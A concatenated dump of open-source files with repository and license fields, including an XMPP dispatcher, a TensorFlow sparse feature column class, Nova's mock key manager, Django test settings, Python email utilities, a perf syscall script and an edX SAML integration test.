self._modules['Receipts'] = Receipts(self._client)
self._modules['OOB'] = OOB(self._client)
self._modules['Correction'] = Correction(self._client)
self._modules['Attention'] = Attention(self._client)
self._modules['SecurityLabels'] = SecurityLabels(self._client)
self._modules['Chatstates'] = Chatstates(self._client)
self._modules['Register'] = Register(self._client)
self._modules['HTTPUpload'] = HTTPUpload(self._client)
self._modules['MAM'] = MAM(self._client)
self._modules['VCardTemp'] = VCardTemp(self._client)
self._modules['VCard4'] = VCard4(self._client)
self._modules['Ping'] = Ping(self._client)
self._modules['Delimiter'] = Delimiter(self._client)
self._modules['Roster'] = Roster(self._client)
self._modules['LastActivity'] = LastActivity(self._client)
self._modules['EntityTime'] = EntityTime(self._client)
for instance in self._modules.values():
for handler in instance.handlers:
self.register_handler(handler)
def reset_parser(self):
if self._parser is not None:
self._parser.dispatch = None
self._parser.destroy()
self._parser = None
self._parser = NodeBuilder(dispatch_depth=2,
finished=False)
self._parser.dispatch = self.dispatch
def replace_non_character(self, data):
return re.sub(self.invalid_chars_re, '\ufffd', data)
def process_data(self, data):
# Parse incoming data
data = self.replace_non_character(data)
if self._client.is_websocket:
stanza = Node(node=data)
if is_websocket_stream_error(stanza):
for tag in stanza.getChildren():
name = tag.getName()
if (name != 'text' and
tag.getNamespace() == Namespace.XMPP_STREAMS):
self._websocket_stream_error = name
elif is_websocket_close(stanza):
self._log.info('Stream <close> received')
self.notify('stream-end', self._websocket_stream_error)
return
self.dispatch(stanza)
return
try:
self._parser.Parse(data)
except (ExpatError, ValueError) as error:
self._log.error('XML parsing error: %s', error)
self.notify('parsing-error', error)
return
# end stream:stream tag received
if self._parser.has_received_endtag():
self._log.info('End of stream: %s', self._parser.streamError)
self.notify('stream-end', self._parser.streamError)
return
def _register_namespace(self, xmlns):
"""
Setup handler structure for namespace
"""
self._log.debug('Register namespace "%s"', xmlns)
self._handlers[xmlns] = {}
self._register_protocol('error', Protocol, xmlns=xmlns)
self._register_protocol('unknown', Protocol, xmlns=xmlns)
self._register_protocol('default', Protocol, xmlns=xmlns)
def _register_protocol(self, tag_name, protocol, xmlns=None):
"""
Register protocol for top level tag names
"""
if xmlns is None:
xmlns = Namespace.CLIENT
self._log.debug('Register protocol "%s (%s)" as %s',
tag_name, xmlns, protocol)
self._handlers[xmlns][tag_name] = {'type': protocol, 'default': []}
def register_handler(self, handler):
"""
Register handler
"""
xmlns = handler.xmlns or Namespace.CLIENT
typ = handler.typ
if not typ and not handler.ns:
typ = 'default'
self._log.debug(
'Register handler %s for "%s" type->%s ns->%s(%s) priority->%s',
handler.callback, handler.name, typ, handler.ns,
xmlns, handler.priority
)
if xmlns not in self._handlers:
self._register_namespace(xmlns)
if handler.name not in self._handlers[xmlns]:
self._register_protocol(handler.name, Protocol, xmlns)
specific = typ + handler.ns
if specific not in self._handlers[xmlns][handler.name]:
self._handlers[xmlns][handler.name][specific] = []
self._handlers[xmlns][handler.name][specific].append(
{'func': handler.callback,
'priority': handler.priority,
'specific': specific})
def unregister_handler(self, handler):
"""
Unregister handler
"""
xmlns = handler.xmlns or Namespace.CLIENT
typ = handler.typ
if not typ and not handler.ns:
typ = 'default'
specific = typ + handler.ns
try:
self._handlers[xmlns][handler.name][specific]
except KeyError:
return
for handler_dict in self._handlers[xmlns][handler.name][specific]:
if handler_dict['func'] != handler.callback:
continue
try:
self._handlers[xmlns][handler.name][specific].remove(
handler_dict)
except ValueError:
self._log.warning(
'Unregister failed: %s for "%s" type->%s ns->%s(%s)',
handler.callback, handler.name, typ, handler.ns, xmlns)
else:
self._log.debug(
'Unregister handler %s for "%s" type->%s ns->%s(%s)',
handler.callback, handler.name, typ, handler.ns, xmlns)
def _default_handler(self, stanza):
"""
Return stanza back to the sender with <feature-not-implemented/> error
"""
if stanza.getType() in ('get', 'set'):
self._client.send_stanza(Error(stanza, ERR_FEATURE_NOT_IMPLEMENTED))
def dispatch(self, stanza):
self.notify('before-dispatch', stanza)
if self._dispatch_callback is not None:
name = stanza.getName()
protocol_class = self._stanza_types.get(name)
if protocol_class is not None:
stanza = protocol_class(node=stanza)
self._dispatch_callback(stanza)
return
# Count stanza
self._client._smacks.count_incoming(stanza.getName())
name = stanza.getName()
xmlns = stanza.getNamespace()
if xmlns not in self._handlers:
self._log.warning('Unknown namespace: %s', xmlns)
xmlns = 'unknown'
if name not in self._handlers[xmlns]:
self._log.warning('Unknown stanza: %s', stanza)
name = 'unknown'
# Convert simplexml to Protocol object
try:
stanza = self._handlers[xmlns][name]['type'](node=stanza)
except InvalidJid:
self._log.warning('Invalid JID, ignoring stanza')
self._log.warning(stanza)
return
own_jid = self._client.get_bound_jid()
properties = get_properties_struct(name, own_jid)
if name == 'iq':
if stanza.getFrom() is None and own_jid is not None:
stanza.setFrom(own_jid.bare)
if name == 'message':
# https://tools.ietf.org/html/rfc6120#section-8.1.1.1
# If the stanza does not include a 'to' address then the client MUST
# treat it as if the 'to' address were included with a value of the
# client's full JID.
to = stanza.getTo()
if to is None:
stanza.setTo(own_jid)
elif not to.bare_match(own_jid):
self._log.warning('Message addressed to someone else: %s',
stanza)
return
if stanza.getFrom() is None:
stanza.setFrom(own_jid.bare)
# Unwrap carbon
try:
stanza, properties.carbon = unwrap_carbon(stanza, own_jid)
except (InvalidFrom, InvalidJid) as exc:
self._log.warning(exc)
self._log.warning(stanza)
return
except NodeProcessed as exc:
self._log.info(exc)
return
# Unwrap mam
try:
stanza, properties.mam = unwrap_mam(stanza, own_jid)
except (InvalidStanza, InvalidJid) as exc:
self._log.warning(exc)
self._log.warning(stanza)
return
typ = stanza.getType()
if name == 'message' and not typ:
typ = 'normal'
elif not typ:
typ = ''
stanza.props = stanza.getProperties()
self._log.debug('type: %s, properties: %s', typ, stanza.props)
# Process callbacks
_id = stanza.getID()
func, _timeout, user_data = self._id_callbacks.pop(
_id, (None, None, {}))
if user_data is None:
user_data = {}
if func is not None:
try:
func(self._client, stanza, **user_data)
except Exception:
self._log.exception('Error while handling stanza')
return
# Gather specifics depending on stanza properties
specifics = ['default']
if typ and typ in self._handlers[xmlns][name]:
specifics.append(typ)
for prop in stanza.props:
if prop in self._handlers[xmlns][name]:
specifics.append(prop)
if typ and typ + prop in self._handlers[xmlns][name]:
specifics.append(typ + prop)
# Create the handler chain
chain = []
chain += self._handlers[xmlns]['default']['default']
for specific in specifics:
chain += self._handlers[xmlns][name][specific]
# Sort chain with priority
chain.sort(key=lambda x: x['priority'])
for handler in chain:
self._log.info('Call handler: %s', handler['func'].__qualname__)
try:
handler['func'](self._client, stanza, properties)
except NodeProcessed:
return
except Exception:
self._log.exception('Handler exception:')
return
# Stanza was not processed call default handler
self._default_handler(stanza)
def add_callback_for_id(self, id_, func, timeout, user_data):
if timeout is not None and self._timeout_id is None:
self._log.info('Add timeout check')
self._timeout_id = GLib.timeout_add_seconds(
1, self._timeout_check)
timeout = time.monotonic() + timeout
self._id_callbacks[id_] = (func, timeout, user_data)
def _timeout_check(self):
self._log.info('Run timeout check')
timeouts = {}
for id_, data in self._id_callbacks.items():
if data[1] is not None:
timeouts[id_] = data
if not timeouts:
self._log.info('Remove timeout check, no timeouts scheduled')
self._timeout_id = None
return False
for id_, data in timeouts.items():
func, timeout, user_data = data
if user_data is None:
user_data = {}
if timeout < time.monotonic():
self._id_callbacks.pop(id_)
func(self._client, None, **user_data)
return True
def _remove_timeout_source(self):
if self._timeout_id is not None:
GLib.source_remove(self._timeout_id)
self._timeout_id = None
def remove_iq_callback(self, id_):
self._id_callbacks.pop(id_, None)
def clear_iq_callbacks(self):
self._log.info('Clear IQ callbacks')
self._id_callbacks.clear()
def cleanup(self):
self._client = None
self._modules = {}
self._parser = None
self.clear_iq_callbacks()
self._dispatch_callback = None
self._handlers.clear()
self._remove_timeout_source()
self.remove_subscriptions()
| gpl-3.0 |
unnikrishnankgs/va | venv/lib/python3.5/site-packages/tensorflow/contrib/linear_optimizer/python/ops/sparse_feature_column.py | 119 | 3797 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sparse feature column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework.ops import internal_convert_to_tensor
from tensorflow.python.framework.ops import name_scope
class SparseFeatureColumn(object):
"""Represents a sparse feature column.
Contains three tensors representing a sparse feature column, they are
example indices (`int64`), feature indices (`int64`), and feature
values (`float`).
Feature weights are optional, and are treated as `1.0f` if missing.
For example, consider a batch of 4 examples, which contains the following
features in a particular `SparseFeatureColumn`:
* Example 0: feature 5, value 1
* Example 1: feature 6, value 1 and feature 10, value 0.5
* Example 2: no features
* Example 3: two copies of feature 2, value 1
This SparseFeatureColumn will be represented as follows:
```
<0, 5, 1>
<1, 6, 1>
<1, 10, 0.5>
<3, 2, 1>
<3, 2, 1>
```
For a batch of 2 examples below:
* Example 0: feature 5
* Example 1: feature 6
is represented by `SparseFeatureColumn` as:
```
<0, 5, 1>
<1, 6, 1>
```
@@__init__
@@example_indices
@@feature_indices
@@feature_values
"""
def __init__(self, example_indices, feature_indices, feature_values):
"""Creates a `SparseFeatureColumn` representation.
Args:
example_indices: A 1-D int64 tensor of shape `[N]`. Also, accepts
python lists, or numpy arrays.
feature_indices: A 1-D int64 tensor of shape `[N]`. Also, accepts
python lists, or numpy arrays.
feature_values: An optional 1-D tensor float tensor of shape `[N]`. Also,
accepts python lists, or numpy arrays.
Returns:
A `SparseFeatureColumn`
"""
with name_scope(None, 'SparseFeatureColumn',
[example_indices, feature_indices]):
self._example_indices = internal_convert_to_tensor(
example_indices, name='example_indices', dtype=dtypes.int64)
self._feature_indices = internal_convert_to_tensor(
feature_indices, name='feature_indices', dtype=dtypes.int64)
self._feature_values = None
if feature_values is not None:
with name_scope(None, 'SparseFeatureColumn', [feature_values]):
self._feature_values = internal_convert_to_tensor(
feature_values, name='feature_values', dtype=dtypes.float32)
@property
def example_indices(self):
"""The example indices represented as a dense tensor.
Returns:
A 1-D Tensor of int64 with shape `[N]`.
"""
return self._example_indices
@property
def feature_indices(self):
"""The feature indices represented as a dense tensor.
Returns:
A 1-D Tensor of int64 with shape `[N]`.
"""
return self._feature_indices
@property
def feature_values(self):
"""The feature values represented as a dense tensor.
Returns:
May return None, or a 1-D Tensor of float32 with shape `[N]`.
"""
return self._feature_values
| bsd-2-clause |
angdraug/nova | nova/keymgr/mock_key_mgr.py | 18 | 4432 | # Copyright (c) 2013 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A mock implementation of a key manager that stores keys in a dictionary.
This key manager implementation is primarily intended for testing. In
particular, it does not store keys persistently. Lack of a centralized key
store also makes this implementation unsuitable for use among different
services.
Note: Instantiating this class multiple times will create separate key stores.
Keys created in one instance will not be accessible from other instances of
this class.
"""
import array
from nova import exception
from nova.i18n import _
from nova.keymgr import key
from nova.keymgr import key_mgr
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova import utils
LOG = logging.getLogger(__name__)
class MockKeyManager(key_mgr.KeyManager):
"""This mock key manager implementation supports all the methods specified
by the key manager interface. This implementation stores keys within a
dictionary, and as a result, it is not acceptable for use across different
services. Side effects (e.g., raising exceptions) for each method are
handled as specified by the key manager interface.
This key manager is not suitable for use in production deployments.
"""
def __init__(self):
LOG.warn(_('This key manager is not suitable for use in production'
' deployments'))
self.keys = {}
def _generate_hex_key(self, **kwargs):
key_length = kwargs.get('key_length', 256)
# hex digit => 4 bits
hex_encoded = utils.generate_password(length=key_length / 4,
symbolgroups='0123456789ABCDEF')
return hex_encoded
def _generate_key(self, **kwargs):
_hex = self._generate_hex_key(**kwargs)
return key.SymmetricKey('AES',
array.array('B', _hex.decode('hex')).tolist())
def create_key(self, ctxt, **kwargs):
"""Creates a key.
This implementation returns a UUID for the created key. A
Forbidden exception is raised if the specified context is None.
"""
if ctxt is None:
raise exception.Forbidden()
key = self._generate_key(**kwargs)
return self.store_key(ctxt, key)
def _generate_key_id(self):
key_id = uuidutils.generate_uuid()
while key_id in self.keys:
key_id = uuidutils.generate_uuid()
return key_id
def store_key(self, ctxt, key, **kwargs):
"""Stores (i.e., registers) a key with the key manager."""
if ctxt is None:
raise exception.Forbidden()
key_id = self._generate_key_id()
self.keys[key_id] = key
return key_id
def copy_key(self, ctxt, key_id, **kwargs):
if ctxt is None:
raise exception.Forbidden()
copied_key_id = self._generate_key_id()
self.keys[copied_key_id] = self.keys[key_id]
return copied_key_id
def get_key(self, ctxt, key_id, **kwargs):
"""Retrieves the key identified by the specified id.
This implementation returns the key that is associated with the
specified UUID. A Forbidden exception is raised if the specified
context is None; a KeyError is raised if the UUID is invalid.
"""
if ctxt is None:
raise exception.Forbidden()
return self.keys[key_id]
def delete_key(self, ctxt, key_id, **kwargs):
"""Deletes the key identified by the specified id.
A Forbidden exception is raised if the context is None and a
KeyError is raised if the UUID is invalid.
"""
if ctxt is None:
raise exception.Forbidden()
del self.keys[key_id]
| apache-2.0 |
jrief/django-angular | examples/server/tests/settings.py | 1 | 3584 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""Django settings for unit test project."""
import os
DEBUG = True
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.sqlite',
},
}
SITE_ID = 1
ROOT_URLCONF = 'server.urls'
SECRET_KEY = 'secret'
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'django.contrib.staticfiles',
'easy_thumbnails',
'sekizai',
'djng',
'server',
]
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory that holds static files.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.environ.get('DJANGO_STATIC_ROOT', '')
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'client', 'src'),
)
# FORM_RENDERER = 'djng.forms.renderers.DjangoAngularTemplates'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.template.context_processors.request',
'django.contrib.messages.context_processors.messages',
'server.context_processors.global_context',
],
},
},
]
TIME_ZONE = 'Europe/Berlin'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '[%(asctime)s %(module)s] %(levelname)s: %(message)s'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': 'INFO',
'propagate': True,
},
},
}
# if package django-websocket-redis is installed, some more tests can be be added
try:
import ws4redis
INSTALLED_APPS.append('ws4redis')
for template in TEMPLATES:
template["OPTIONS"]["context_processors"].append('ws4redis.context_processors.default')
# This setting is required to override the Django's main loop, when running in
# development mode, such as ./manage runserver
WSGI_APPLICATION = 'ws4redis.django_runserver.application'
# URL that distinguishes websocket connections from normal requests
WEBSOCKET_URL = '/ws/'
# Set the number of seconds each message shall persist
WS4REDIS_EXPIRE = 3600
WS4REDIS_HEARTBEAT = '--heartbeat--'
WS4REDIS_PREFIX = 'djangular'
except ImportError:
pass
| mit |
deanhiller/databus | webapp/play1.3.x/python/Lib/email/utils.py | 3 | 10124 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org
"""Miscellaneous utilities."""
__all__ = [
'collapse_rfc2231_value',
'decode_params',
'decode_rfc2231',
'encode_rfc2231',
'formataddr',
'formatdate',
'getaddresses',
'make_msgid',
'parseaddr',
'parsedate',
'parsedate_tz',
'unquote',
]
import os
import re
import time
import base64
import random
import socket
import urllib
import warnings
from email._parseaddr import quote
from email._parseaddr import AddressList as _AddressList
from email._parseaddr import mktime_tz
# We need wormarounds for bugs in these methods in older Pythons (see below)
from email._parseaddr import parsedate as _parsedate
from email._parseaddr import parsedate_tz as _parsedate_tz
from quopri import decodestring as _qdecode
# Intrapackage imports
from email.encoders import _bencode, _qencode
COMMASPACE = ', '
EMPTYSTRING = ''
UEMPTYSTRING = u''
CRLF = '\r\n'
TICK = "'"
specialsre = re.compile(r'[][\\()<>@,:;".]')
escapesre = re.compile(r'[][\\()"]')
# Helpers
def _identity(s):
return s
def _bdecode(s):
# We can't quite use base64.encodestring() since it tacks on a "courtesy
# newline". Blech!
if not s:
return s
value = base64.decodestring(s)
if not s.endswith('\n') and value.endswith('\n'):
return value[:-1]
return value
def fix_eols(s):
"""Replace all line-ending characters with \r\n."""
# Fix newlines with no preceding carriage return
s = re.sub(r'(?<!\r)\n', CRLF, s)
# Fix carriage returns with no following newline
s = re.sub(r'\r(?!\n)', CRLF, s)
return s
def formataddr(pair):
"""The inverse of parseaddr(), this takes a 2-tuple of the form
(realname, email_address) and returns the string value suitable
for an RFC 2822 From, To or Cc header.
If the first element of pair is false, then the second element is
returned unmodified.
"""
name, address = pair
if name:
quotes = ''
if specialsre.search(name):
quotes = '"'
name = escapesre.sub(r'\\\g<0>', name)
return '%s%s%s <%s>' % (quotes, name, quotes, address)
return address
def getaddresses(fieldvalues):
"""Return a list of (REALNAME, EMAIL) for each fieldvalue."""
all = COMMASPACE.join(fieldvalues)
a = _AddressList(all)
return a.addresslist
ecre = re.compile(r'''
=\? # literal =?
(?P<charset>[^?]*?) # non-greedy up to the next ? is the charset
\? # literal ?
(?P<encoding>[qb]) # either a "q" or a "b", case insensitive
\? # literal ?
(?P<atom>.*?) # non-greedy up to the next ?= is the atom
\?= # literal ?=
''', re.VERBOSE | re.IGNORECASE)
def formatdate(timeval=None, localtime=False, usegmt=False):
"""Returns a date string as specified by RFC 2822, e.g.:
Fri, 09 Nov 2001 01:08:47 -0000
Optional timeval if given is a floating point time value as accepted by
gmtime() and localtime(), otherwise the current time is used.
Optional localtime is a flag that when True, interprets timeval, and
returns a date relative to the local timezone instead of UTC, properly
taking daylight savings time into account.
Optional argument usegmt means that the timezone is written out as
an ascii string, not numeric one (so "GMT" instead of "+0000"). This
is needed for HTTP, and is only used when localtime==False.
"""
# Note: we cannot use strftime() because that honors the locale and RFC
# 2822 requires that day and month names be the English abbreviations.
if timeval is None:
timeval = time.time()
if localtime:
now = time.localtime(timeval)
# Calculate timezone offset, based on whether the local zone has
# daylight savings time, and whether DST is in effect.
if time.daylight and now[-1]:
offset = time.altzone
else:
offset = time.timezone
hours, minutes = divmod(abs(offset), 3600)
# Remember offset is in seconds west of UTC, but the timezone is in
# minutes east of UTC, so the signs differ.
if offset > 0:
sign = '-'
else:
sign = '+'
zone = '%s%02d%02d' % (sign, hours, minutes // 60)
else:
now = time.gmtime(timeval)
# Timezone offset is always -0000
if usegmt:
zone = 'GMT'
else:
zone = '-0000'
return '%s, %02d %s %04d %02d:%02d:%02d %s' % (
['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'][now[6]],
now[2],
['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'][now[1] - 1],
now[0], now[3], now[4], now[5],
zone)
def make_msgid(idstring=None):
"""Returns a string suitable for RFC 2822 compliant Message-ID, e.g:
<20020201195627.33539.96671@nightshade.la.mastaler.com>
Optional idstring if given is a string used to strengthen the
uniqueness of the message id.
"""
timeval = time.time()
utcdate = time.strftime('%Y%m%d%H%M%S', time.gmtime(timeval))
pid = os.getpid()
randint = random.randrange(100000)
if idstring is None:
idstring = ''
else:
idstring = '.' + idstring
idhost = socket.getfqdn()
msgid = '<%s.%s.%s%s@%s>' % (utcdate, pid, randint, idstring, idhost)
return msgid
# These functions are in the standalone mimelib version only because they've
# subsequently been fixed in the latest Python versions. We use this to worm
# around broken older Pythons.
def parsedate(data):
if not data:
return None
return _parsedate(data)
def parsedate_tz(data):
if not data:
return None
return _parsedate_tz(data)
def parseaddr(addr):
addrs = _AddressList(addr).addresslist
if not addrs:
return '', ''
return addrs[0]
# rfc822.unquote() doesn't properly de-backslash-ify in Python pre-2.3.
def unquote(str):
"""Remove quotes from a string."""
if len(str) > 1:
if str.startswith('"') and str.endswith('"'):
return str[1:-1].replace('\\\\', '\\').replace('\\"', '"')
if str.startswith('<') and str.endswith('>'):
return str[1:-1]
return str
# RFC2231-related functions - parameter encoding and decoding
def decode_rfc2231(s):
"""Decode string according to RFC 2231"""
parts = s.split(TICK, 2)
if len(parts) <= 2:
return None, None, s
return parts
def encode_rfc2231(s, charset=None, language=None):
"""Encode string according to RFC 2231.
If neither charset nor language is given, then s is returned as-is. If
charset is given but not language, the string is encoded using the empty
string for language.
"""
import urllib
s = urllib.quote(s, safe='')
if charset is None and language is None:
return s
if language is None:
language = ''
return "%s'%s'%s" % (charset, language, s)
rfc2231_continuation = re.compile(r'^(?P<name>\w+)\*((?P<num>[0-9]+)\*?)?$')
def decode_params(params):
"""Decode parameters list according to RFC 2231.
params is a sequence of 2-tuples containing (param name, string value).
"""
# Copy params so we don't mess with the original
params = params[:]
new_params = []
# Map parameter's name to a list of continuations. The values are a
# 3-tuple of the continuation number, the string value, and a flag
# specifying whether a particular segment is %-encoded.
rfc2231_params = {}
name, value = params.pop(0)
new_params.append((name, value))
while params:
name, value = params.pop(0)
if name.endswith('*'):
encoded = True
else:
encoded = False
value = unquote(value)
mo = rfc2231_continuation.match(name)
if mo:
name, num = mo.group('name', 'num')
if num is not None:
num = int(num)
rfc2231_params.setdefault(name, []).append((num, value, encoded))
else:
new_params.append((name, '"%s"' % quote(value)))
if rfc2231_params:
for name, continuations in rfc2231_params.items():
value = []
extended = False
# Sort by number
continuations.sort()
# And now append all values in numerical order, converting
# %-encodings for the encoded segments. If any of the
# continuation names ends in a *, then the entire string, after
# decoding segments and concatenating, must have the charset and
# language specifiers at the beginning of the string.
for num, s, encoded in continuations:
if encoded:
s = urllib.unquote(s)
extended = True
value.append(s)
value = quote(EMPTYSTRING.join(value))
if extended:
charset, language, value = decode_rfc2231(value)
new_params.append((name, (charset, language, '"%s"' % value)))
else:
new_params.append((name, '"%s"' % value))
return new_params
def collapse_rfc2231_value(value, errors='replace',
fallback_charset='us-ascii'):
if isinstance(value, tuple):
rawval = unquote(value[2])
charset = value[0] or 'us-ascii'
try:
return unicode(rawval, charset, errors)
except LookupError:
# XXX charset is unknown to Python.
return unicode(rawval, fallback_charset, errors)
else:
return unquote(value)
| mpl-2.0 |
kornyone/google-kernel-steelhead | tools/perf/scripts/python/syscall-counts-by-pid.py | 11180 | 1927 | # system call counts, by pid
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts-by-pid.py [comm]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
try:
syscalls[common_comm][common_pid][id] += 1
except TypeError:
syscalls[common_comm][common_pid][id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events by comm/pid:\n\n",
print "%-40s %10s\n" % ("comm [pid]/syscalls", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id, val in sorted(syscalls[comm][pid].iteritems(), \
key = lambda(k, v): (v, k), reverse = True):
print " %-38s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
kursitet/edx-platform | common/djangoapps/third_party_auth/tests/specs/test_testshib.py | 46 | 5259 | """
Third_party_auth integration tests using a mock version of the TestShib provider
"""
import unittest
import httpretty
from mock import patch
from third_party_auth.tasks import fetch_saml_metadata
from third_party_auth.tests import testutil
from .base import IntegrationTestMixin
TESTSHIB_ENTITY_ID = 'https://idp.testshib.org/idp/shibboleth'
TESTSHIB_METADATA_URL = 'https://mock.testshib.org/metadata/testshib-providers.xml'
TESTSHIB_SSO_URL = 'https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO'
@unittest.skipUnless(testutil.AUTH_FEATURE_ENABLED, 'third_party_auth not enabled')
class TestShibIntegrationTest(IntegrationTestMixin, testutil.SAMLTestCase):
"""
TestShib provider Integration Test, to test SAML functionality
"""
PROVIDER_ID = "saml-testshib"
PROVIDER_NAME = "TestShib"
PROVIDER_BACKEND = "tpa-saml"
USER_EMAIL = "myself@testshib.org"
USER_NAME = "Me Myself And I"
USER_USERNAME = "myself"
def setUp(self):
super(TestShibIntegrationTest, self).setUp()
self.enable_saml(
private_key=self._get_private_key(),
public_key=self._get_public_key(),
entity_id="https://saml.example.none",
)
# Mock out HTTP requests that may be made to TestShib:
httpretty.enable()
def metadata_callback(_request, _uri, headers):
""" Return a cached copy of TestShib's metadata by reading it from disk """
return (200, headers, self.read_data_file('testshib_metadata.xml'))
httpretty.register_uri(httpretty.GET, TESTSHIB_METADATA_URL, content_type='text/xml', body=metadata_callback)
self.addCleanup(httpretty.disable)
self.addCleanup(httpretty.reset)
# Configure the SAML library to use the same request ID for every request.
# Doing this and freezing the time allows us to play back recorded request/response pairs
uid_patch = patch('onelogin.saml2.utils.OneLogin_Saml2_Utils.generate_unique_id', return_value='TESTID')
uid_patch.start()
self.addCleanup(uid_patch.stop)
self._freeze_time(timestamp=1434326820) # This is the time when the saved request/response was recorded.
def test_login_before_metadata_fetched(self):
self._configure_testshib_provider(fetch_metadata=False)
# The user goes to the login page, and sees a button to login with TestShib:
testshib_login_url = self._check_login_page()
# The user clicks on the TestShib button:
try_login_response = self.client.get(testshib_login_url)
# The user should be redirected to back to the login page:
self.assertEqual(try_login_response.status_code, 302)
self.assertEqual(try_login_response['Location'], self.url_prefix + self.login_page_url)
# When loading the login page, the user will see an error message:
response = self.client.get(self.login_page_url)
self.assertEqual(response.status_code, 200)
self.assertIn('Authentication with TestShib is currently unavailable.', response.content)
def test_login(self):
""" Configure TestShib before running the login test """
self._configure_testshib_provider()
super(TestShibIntegrationTest, self).test_login()
def test_register(self):
""" Configure TestShib before running the register test """
self._configure_testshib_provider()
super(TestShibIntegrationTest, self).test_register()
def _freeze_time(self, timestamp):
""" Mock the current time for SAML, so we can replay canned requests/responses """
now_patch = patch('onelogin.saml2.utils.OneLogin_Saml2_Utils.now', return_value=timestamp)
now_patch.start()
self.addCleanup(now_patch.stop)
def _configure_testshib_provider(self, **kwargs):
""" Enable and configure the TestShib SAML IdP as a third_party_auth provider """
fetch_metadata = kwargs.pop('fetch_metadata', True)
kwargs.setdefault('name', 'TestShib')
kwargs.setdefault('enabled', True)
kwargs.setdefault('idp_slug', 'testshib')
kwargs.setdefault('entity_id', TESTSHIB_ENTITY_ID)
kwargs.setdefault('metadata_source', TESTSHIB_METADATA_URL)
kwargs.setdefault('icon_class', 'fa-university')
kwargs.setdefault('attr_email', 'urn:oid:1.3.6.1.4.1.5923.1.1.1.6') # eduPersonPrincipalName
self.configure_saml_provider(**kwargs)
if fetch_metadata:
self.assertTrue(httpretty.is_enabled())
num_changed, num_failed, num_total = fetch_saml_metadata()
self.assertEqual(num_failed, 0)
self.assertEqual(num_changed, 1)
self.assertEqual(num_total, 1)
def do_provider_login(self, provider_redirect_url):
""" Mocked: the user logs in to TestShib and then gets redirected back """
# The SAML provider (TestShib) will authenticate the user, then get the browser to POST a response:
self.assertTrue(provider_redirect_url.startswith(TESTSHIB_SSO_URL))
return self.client.post(
self.complete_url,
content_type='application/x-www-form-urlencoded',
data=self.read_data_file('testshib_response.txt'),
)
| agpl-3.0 |
Ialong/shogun | examples/undocumented/python_modular/modelselection_grid_search_liblinear_modular.py | 26 | 3062 | #!/usr/bin/env python
#
